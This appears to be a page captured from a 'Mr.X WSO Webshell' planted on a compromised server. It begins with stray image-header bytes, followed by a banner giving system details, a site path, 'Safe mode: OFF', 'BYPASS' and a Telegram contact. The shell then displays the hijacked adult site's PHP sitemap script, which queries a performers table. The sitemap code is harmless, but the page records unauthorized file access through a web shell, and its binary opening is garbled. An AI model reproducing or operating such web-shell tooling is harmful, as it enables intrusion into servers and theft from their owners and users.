����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 06:04:44 1999.30 GB Free: 76.84 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
include('mb.php');
header('Content-type: text/xml; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
';
$max = 10000;
$from = is_numeric($_GET['offset']) ? (int) $_GET['offset'] : 0;
$result = dbQuery("SELECT `record_num`, `name` FROM `pornstars`");
foreach ($result as $row) {
echo '<url>
<loc>' . generateUrl('pornstars', $row['name'], $row['record_num']) . '</loc>
<priority>0.56</priority>
<changefreq>weekly</changefreq>
<lastmod>' . date('c') . '</lastmod>
</url>';
}
echo '</urlset>';
?>